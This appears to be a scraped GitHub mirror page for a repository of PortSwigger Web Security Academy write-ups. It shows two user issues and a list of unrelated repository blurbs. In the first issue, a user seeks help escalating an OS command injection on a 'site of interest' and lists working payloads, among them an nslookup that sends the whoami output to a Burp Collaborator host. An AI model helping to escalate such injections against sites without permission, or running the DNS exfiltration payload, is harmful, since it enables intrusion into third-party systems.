frank-leitner / portswigger-websecurity-academy Goto Github PK
View Code? Open in Web Editor NEWWriteups for PortSwigger WebSecurity Academy
Writeups for PortSwigger WebSecurity Academy
A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature
Issue: OS command injection
Severity: High
Confidence: Certain
the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.
These are the only commands it respond to.
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
other commands like nslookup $(whoami).xxx.burp collaborator.com
They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.
I await your response.
Thanx
Hello Frank Leitner very nice to meet you, I'm Luis Fernando Mendoza from Mexico I'm a software engineer with more than 6 years of experience in the field of web development and I'm starting in the cybersecurity world and I was reading the description of this repository and I'm too following the video tutorials of Rana Khalil, I was wondering if you have some advice to me, I'm trying to enter de world of bug bounty, how was your approach into this field, what things to keep in mind when entering this field, etc etc, I'm very passionate on this topics, thank you in advance!
PD: I sent a linkedin invitation, thank you!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.